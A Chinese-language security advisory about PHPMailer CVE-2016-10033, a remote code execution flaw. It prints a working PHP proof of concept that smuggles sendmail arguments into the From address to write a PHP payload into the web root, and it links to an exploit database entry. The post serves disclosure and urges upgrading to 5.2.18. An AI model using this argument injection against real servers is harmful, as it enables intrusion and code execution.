PHPMailer远程代码执行高危漏洞(CVE-2016-10033)含PoC

这次曝出远程代码执行漏洞的是堪称全球最流行邮件发送类的PHPMailer,据说其全球范围内的用户量大约有900万——每天还在持续增多。

GitHub上面形容PHPMailer“可能是全球PHP发送邮件最流行的代码。亦被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等”。所以这个漏洞影响范围还是比较广的,漏洞级别也为Critical最高级。

漏洞编码

CVE-2016-10033

影响版本

PHPMailer <  5.2.18

漏洞级别

高危

漏洞描述

独立研究人员Dawid Golunski发现了该漏洞——远程攻击者利用该漏洞,可实现远程任意代码在web服务器账户环境中执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反馈表单,注册表单,邮件密码重置表单等使用邮件发送的组件时利用此漏洞。

不过有关该漏洞的细节信息,研究人员并未披露,期望给予网站管理员更多的时间来升级PHPMailer类,避免受漏洞影响。

漏洞PoC

实际上Dawid Golunski已经做了个可行的RCE PoC,不过会迟一些再发布。关注视频PoC请点击:https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

更新:PoC代码已经公布,请站长们尽快升级!

<?php 
/* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 
09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc. 
// For example from a Contact form 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; 
// ------------------ 
// mail() param injection via the vulnerability in PHPMailer 
require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()" 
$mail->SetFrom($email_from, 'Client Name'); 
$address = "[email protected]"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); 
if(!$mail->Send()) { 
echo "Mailer Error: " . $mail->ErrorInfo; 
} else { 
echo "Message sent!\n"; 
} 

漏洞修复

更新到5.2.18:https://github.com/PHPMailer/PHPMailer

漏洞详情目前已经提交给了PHPMailer官方——官方也已经发布了PHPMailer 5.2.18紧急安全修复,解决上述问题,受影响的用户应当立即升级。详情可参见:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md

exp地址:https://www.exploit-db.com/exploits/40968/

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: